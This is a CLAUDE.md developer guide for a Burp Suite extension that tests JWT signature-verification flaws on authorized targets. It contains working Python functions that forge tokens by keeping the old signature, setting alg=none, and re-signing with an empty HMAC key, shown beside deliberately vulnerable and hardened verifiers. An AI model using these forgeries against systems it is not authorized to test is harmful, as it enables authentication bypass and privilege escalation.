CLAUDE.md

This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.

Project Overview

This is a Burp Suite extension for testing JWT (JSON Web Token) vulnerabilities in web applications. The extension intercepts in-scope HTTP requests passing through the proxy, extracts the JWT from the Authorization header or a cookie, rewrites a configured claim, and replays the token in several forged variants to find servers that accept a token whose signature no longer covers its payload.

Build and Development Commands

Build

./gradlew build

Clean Build

./gradlew clean build

Create JAR

./gradlew jar

The JAR will be created at build/libs/burp-jwt-claim-probe-1.0.0.jar

Architecture

Core Components

  1. JwtClaimProbeExtension (src/main/java/jwtprobe/JwtClaimProbeExtension.java)
    • Main extension entry point implementing BurpExtension
    • Initializes settings, UI panel, and proxy handler
    • Registers the extension with Burp Suite
  2. ProxyJwtHandler (src/main/java/jwtprobe/ProxyJwtHandler.java)
    • Implements ProxyRequestHandler to intercept HTTP requests
    • Extracts JWT tokens from Authorization headers or cookies
    • Performs JWT vulnerability testing with various attack vectors
    • Logs findings to /tmp/jwt-claim-probe-issues.log
  3. JwtUtils (src/main/java/jwtprobe/JwtUtils.java)
    • Utility functions for JWT manipulation
    • Token validation, Base64 encoding/decoding
    • JWT modification methods for different attack types:
      • buildTokenKeepSignature() - Modifies payload without re-signing
      • buildTokenAlgNone() - Sets algorithm to 'none' (removes signature)
      • buildTokenHS256EmptyKey() - Signs with empty HMAC key
  4. Settings (src/main/java/jwtprobe/Settings.java)
    • Configuration class with attack options and settings
    • Thread-safe atomic booleans for toggles
    • Configurable claim names, values, and types
  5. SettingsPanel (src/main/java/jwtprobe/SettingsPanel.java)
    • Swing-based UI for extension configuration
    • Allows enabling/disabling attack vectors
    • Configures target claims and expected responses

Attack Vectors

The extension tests three main JWT vulnerability classes, each aimed at a different verifier mistake:

  1. Modify-Only Attack: Changes the claim value but keeps the original header and signature, catching servers that decode the payload without verifying the signature at all
  2. Algorithm None Attack: Sets the alg header to none and sends an empty signature segment, catching verifiers that let the token's own header select the algorithm
  3. Empty Key Attack: Re-signs the token with HS256 and a zero-length secret, catching HMAC verifiers whose secret is empty or was never set
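The three JwtUtils builders and the attack vectors listed above, as an added stand-alone Python model rather than the extension's own Java code: each forgery is built the same way the corresponding builder is described, and it is run against a verifier that makes the matching mistake beside a hardened one. The key, the claims, and all verifier functions are constructed for the demonstration and are not taken from the project.

```python
"""Three JWT forgery variants beside the verifier mistakes they exploit (added example)."""
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    # JWT segments are unpadded base64url (RFC 7515)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_json(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def split_token(token: str):
    """Returns (header dict, payload dict, signature segment as given)."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            signature_b64)


def sign_hs256(signing_input: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def issue_token(payload: dict, key: bytes) -> str:
    """Stand-in for the target application minting a legitimate HS256 token."""
    signing_input = f"{encode_json({'alg': 'HS256', 'typ': 'JWT'})}.{encode_json(payload)}"
    return f"{signing_input}.{sign_hs256(signing_input, key)}"

# --- the three probe variants (constructed counterparts of the JwtUtils builders) ---

def build_token_keep_signature(token: str, claim: str, value) -> str:
    """Modify-only: new payload, original header and signature left untouched."""
    header_b64, _, signature_b64 = token.split(".")
    _, payload, _ = split_token(token)
    payload[claim] = value
    return f"{header_b64}.{encode_json(payload)}.{signature_b64}"

def build_token_alg_none(token: str, claim: str, value) -> str:
    """Algorithm none: alg=none and an empty signature segment."""
    header, payload, _ = split_token(token)
    header["alg"] = "none"
    payload[claim] = value
    return f"{encode_json(header)}.{encode_json(payload)}."

def build_token_hs256_empty_key(token: str, claim: str, value) -> str:
    """Empty key: re-sign with HS256 under a zero-length secret."""
    header, payload, _ = split_token(token)
    header["alg"] = "HS256"
    payload[claim] = value
    signing_input = f"{encode_json(header)}.{encode_json(payload)}"
    return f"{signing_input}.{sign_hs256(signing_input, b'')}"

# --- verifiers: two constructed mistakes beside one hardened version ---

def decode_unverified(token: str, key: bytes) -> dict:
    """Vulnerable to modify-only: returns the payload without checking anything."""
    return split_token(token)[1]

def verify_trusting_header(token: str, key: bytes) -> dict:
    """Vulnerable to alg=none (and to an empty server key): the token picks the check."""
    header, payload, signature = split_token(token)
    if header.get("alg") == "none":
        return payload
    signing_input = token.rsplit(".", 1)[0]
    if header.get("alg") == "HS256" and hmac.compare_digest(signature, sign_hs256(signing_input, key)):
        return payload
    raise ValueError("bad signature")

def verify_hs256_strict(token: str, key: bytes) -> dict:
    """Hardened: algorithm pinned by the verifier, non-empty key, constant-time compare."""
    if not key:
        raise ValueError("refusing to verify with an empty HMAC key")
    header, payload, signature = split_token(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    signing_input = token.rsplit(".", 1)[0]
    if not hmac.compare_digest(signature, sign_hs256(signing_input, key)):
        raise ValueError("bad signature")
    return payload

def accepted(verifier, token: str, key: bytes) -> bool:
    """True when the verifier returns a payload instead of rejecting the token."""
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False
```

Run with a constructed key, for example `issue_token({"sub": "alice", "admin": False}, b"constructed-demo-secret")`, then pass each forgery through `accepted(...)`: the strict verifier rejects all three, `verify_trusting_header` accepts the alg=none token with any server key and accepts the empty-key token only when the server's own key is empty, and `decode_unverified` accepts the modify-only token. Note that the strict verifier pins the algorithm before it ever reads the token's header, which is the property the none attack depends on being absent.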

Token Extraction

  • Authorization Header: Extracts Bearer tokens from Authorization: Bearer <token>
  • Cookie Extraction: Extracts tokens from configurable cookie names
  • Scope Filtering: Only processes requests within Burp's defined scope
  • Anti-Loop Protection: Tags its own probe requests with an X-JWT-Claim-Probe header and skips any request that already carries it, so probes flowing back through the proxy are not probed again

Configuration

Key settings in the Settings class:

  • claimName and claimValue: The claim to modify and its new value
  • claimType: Data type (STRING, BOOLEAN, NUMBER, NULL)
  • okStatus: HTTP status code a response to a forged token must return for the probe to be reported as a finding
  • allowedMethods: HTTP methods to process (default: GET, POST)
  • ignoreExt: Regex pattern for file extensions to skip
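The request selection, token extraction and claim typing described under Token Extraction and Configuration, as an added Python example that is not the extension's Java code. The in-scope host list (standing in for Burp's scope), the cookie names, the default ignoreExt pattern, the value format of the X-JWT-Claim-Probe header and all sample requests are constructed assumptions for the demonstration.

```python
"""Request selection, token extraction and claim typing for a JWT probe (added example)."""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Anti-loop header named on the page; how it is valued is an assumption here.
PROBE_MARKER = "X-JWT-Claim-Probe"

# Compact JWT: two base64url segments plus a signature that may be empty (alg=none).
JWT_RE = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")


@dataclass(frozen=True)
class Settings:
    claim_name: str = "role"
    claim_value: str = "admin"
    claim_type: str = "STRING"                 # STRING, BOOLEAN, NUMBER, NULL
    ok_status: int = 200                       # status a forged-token response must return
    allowed_methods: frozenset = frozenset({"GET", "POST"})
    ignore_ext: str = r"\.(?:png|jpe?g|gif|css|js|woff2?|svg|ico)$"   # assumed default
    cookie_names: tuple = ("jwt", "access_token")                      # assumed default
    in_scope_hosts: tuple = ("app.example",)   # stands in for Burp's scope list


@dataclass
class Request:
    method: str
    host: str
    path: str
    headers: dict   # header name -> value; names are matched case-insensitively


def header(req: Request, name: str) -> Optional[str]:
    """Case-insensitive header lookup."""
    for key, value in req.headers.items():
        if key.lower() == name.lower():
            return value
    return None


def should_probe(req: Request, s: Settings) -> bool:
    """Scope, method, extension and anti-loop filters; any one failing skips the request."""
    if req.host not in s.in_scope_hosts:
        return False
    if req.method.upper() not in s.allowed_methods:
        return False
    path_only = req.path.split("?", 1)[0]          # never let a query string defeat ignoreExt
    if re.search(s.ignore_ext, path_only, re.IGNORECASE):
        return False
    if header(req, PROBE_MARKER) is not None:      # a probe we sent, seen again by the proxy
        return False
    return True


def parse_cookies(raw: str) -> dict:
    jar = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name.strip()] = value.strip()
    return jar


def extract_token(req: Request, s: Settings) -> Optional[Tuple[str, str]]:
    """(location, token) from a Bearer Authorization header, else from a configured cookie."""
    auth = header(req, "Authorization")
    if auth:
        scheme, _, value = auth.strip().partition(" ")
        value = value.strip()
        if scheme.lower() == "bearer" and JWT_RE.match(value):
            return ("authorization", value)
    raw_cookie = header(req, "Cookie")
    if raw_cookie:
        jar = parse_cookies(raw_cookie)
        for name in s.cookie_names:
            if name in jar and JWT_RE.match(jar[name]):
                return (f"cookie:{name}", jar[name])
    return None


def typed_claim_value(s: Settings):
    """Turn the configured string into the JSON value selected by claimType."""
    kind = s.claim_type.upper()
    if kind == "STRING":
        return s.claim_value
    if kind == "BOOLEAN":
        return s.claim_value.strip().lower() in ("true", "1", "yes")
    if kind == "NUMBER":
        text = s.claim_value.strip()
        return int(text) if re.fullmatch(r"-?\d+", text) else float(text)
    if kind == "NULL":
        return None
    raise ValueError(f"unknown claimType: {s.claim_type}")


def is_finding(status: int, s: Settings) -> bool:
    """A forged token whose response carries okStatus is reported as a finding."""
    return status == s.ok_status
```

Two details worth keeping when porting this logic: the extension regex is applied to the path with the query string removed, so `/static/app.js?v=3` is still skipped, and the anti-loop check runs before any token is extracted, so a replayed probe never spawns further probes. The claim typing matters because a server may treat `"true"` and `true` differently when checking an `admin` claim.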

Dependencies

  • Java 17+
  • Burp Suite Montoya API (2024.11)
  • Gradle build system

Security Testing Purpose

This tool is designed for authorized security testing to identify:

  • JWT implementations that don't properly validate signatures
  • Applications accepting unsigned tokens (alg=none)
  • Weak key management (empty HMAC keys)
  • Insufficient claim validation

Results are logged both to Burp's extension output and, as JSON, to /tmp/jwt-claim-probe-issues.log for further analysis. Because /tmp is normally shared by every user of the host, treat that file as sensitive engagement data: it records findings against live targets, so restrict or remove it once testing is complete.